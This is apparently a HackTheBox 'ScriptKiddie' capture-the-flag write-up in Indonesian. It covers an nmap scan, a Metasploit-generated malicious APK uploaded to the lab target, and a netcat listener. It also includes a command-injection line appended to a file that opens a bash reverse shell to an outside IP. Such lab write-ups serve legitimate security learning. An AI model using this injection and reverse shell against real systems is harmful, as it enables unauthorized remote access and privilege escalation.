HackTheBox — ScriptKiddie Writeup
Langkah pertama yang harus dilakukan adalah dengan melakukan nmap untuk mengetahui port yang terbuka, karena IP address 10.10.10.226 tidak dapat dibuka jika tidak menggunakan port.
Gunakan port 5000 dengan service upnp (universal plug and play)
Menggunakan command yang sudah tersedia di internet untuk melakukan metasploit.
Menggunakan command ‘msfconsole’ sebelum mengikuti command diatas untuk masuk ke dalam metasploit.
Setelah setting LHOST, RPORT, dan RHOST, jalankan command ‘exploit’ untuk membuat membuat msf.apk yang akan digunakan untuk payload pada web.
Note : set permission msf.apk menjadi allows all (chmod 777).
Untuk menangkap koneksi yang akan terhubung, gunakan command nc atau netcat pada LPORT. Saya tidak setting LPORT pada exploit diatas, jadi LPORT masih dalam bentuk default yaitu 4444.
Masukkan msf.apk yang sudah dibuat ke dalam payloads yang terdapat pada 10.10.10.226:5000.
Setelah koneksi berhasil ditangkap, jalankan command seperti di bawah untuk meredirect directory untuk
Command yang akan dilakukan :
- cd //digunakan untuk kembali ke directory awal
- ls //untuk melakukan pemeriksaan file yang ada
- cat user.txt //untuk melihat isi dan user flag yang diinginkan.
Setelah melakukan command seperti di atas, kita akan menemukan file .sh yang dapat dibuka menggunakan command ‘cat’. File berisi bash script. Set nc pada port yang dituju lalu jalankan command sebagai berikut :
echo “ ;/bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.96/4444 0>&1’ #” >> hackers
Setelah berhasil masuk ke dalam account dengan permission yang lebih tinggi, kita akan membuka file .sh yang ada di dalam directory (dapat diketahui dengan menggunakan command ‘ls’)
Command yang akan dilakukan:
- msfconsole
- ls
- cat root.txt //dengan menjalankan command ini, maka kita akan mendapatkan flag yang diinginkan
Sekian dan terima kasih
